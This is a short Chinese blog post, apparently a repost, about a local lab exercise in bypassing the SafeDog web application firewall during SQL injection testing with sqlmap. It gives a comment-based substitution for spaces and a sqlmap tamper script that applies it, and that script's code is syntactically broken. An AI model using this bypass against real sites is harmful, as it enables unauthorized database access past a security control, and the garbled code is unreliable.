码迷,mamicode.com
首页 > 数据库 > 详细

sqlmap过狗脚本练习1

时间:2020-05-27 13:46:26      阅读:123      评论:0      收藏:0      [点我收藏+]

标签:网站   本地   -o   one   height   搭建   isp   参数   aaa   

本地搭建sql注入网站练习

技术图片技术图片?

测试安全狗,输入不合法参数被安全狗拦截:

技术图片技术图片?

使用sqlmap:

技术图片技术图片?

技术图片技术图片?

检测到防护机制,失败;

先手工尝试绕过安全狗:

技术图片技术图片?

将空格替换为  “/*//\*//\*\/c*/” 成功绕过安全狗;

写个sqlmap脚本:

#demo.py
def tamper(payload,**kwargs):
    retVal = payload
    quote=False
    if payload:
        retVal = ‘‘
        for i in payload:
            if i =="" and i==":
                quote = not quote
            elif i.isspace() and not quote:
                retVal+=/*//\*//\*\/c*/
            else:
                retVal+=i
    return retVal
技术图片

加上脚本继续跑:

技术图片技术图片?

技术图片技术图片?

成功!(之后试了几次就不行了,与安全狗的检测机制有关。。。)

 

sqlmap过狗脚本练习1

标签:网站   本地   -o   one   height   搭建   isp   参数   aaa   

原文地址:https://www.cnblogs.com/suiyz/p/12972345.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!